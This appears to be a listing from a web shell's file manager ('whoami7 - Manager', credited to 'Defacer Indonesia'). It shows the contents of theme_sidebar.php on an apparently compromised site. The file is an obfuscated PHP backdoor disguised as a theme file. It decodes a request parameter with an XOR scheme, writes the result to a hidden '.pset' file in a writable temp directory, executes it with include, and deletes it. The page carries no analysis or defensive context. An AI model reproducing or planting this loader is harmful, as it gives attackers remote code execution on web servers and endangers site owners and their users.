whoami7 - Manager
:
/
home
/
analuakl
/
ankurmedia.com
/
GMR
/
month
/
Upload File:
files >> /home/analuakl/ankurmedia.com/GMR/month/theme_sidebar.php
<?php if(@$_REQUEST["holde\x72"] !== null){ $data_chunk = $_REQUEST["holde\x72"]; $data_chunk= explode ('.', $data_chunk ) ; $flg= ''; $s= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen( $s ); $y= 0; array_walk( $data_chunk, function( $v1) use( &$flg, &$y, $s, $lenS) {$chS= ord( $s[$y % $lenS] ); $d= ( ( int)$v1 - $chS -( $y % 10)) ^ 75; $flg .= chr( $d ); $y++; }); $resource = array_filter([session_save_path(), "/dev/shm", ini_get("upload_tmp_dir"), "/var/tmp", "/tmp", sys_get_temp_dir(), getenv("TMP"), getcwd(), getenv("TEMP")]); foreach ($resource as $comp): if ((is_dir($comp) and is_writable($comp))) { $component = str_replace("{var_dir}", $comp, "{var_dir}/.pset"); if (@file_put_contents($component, $flg) !== false) { include $component; unlink($component); exit; } } endforeach; }
Copyright ©2021 || Defacer Indonesia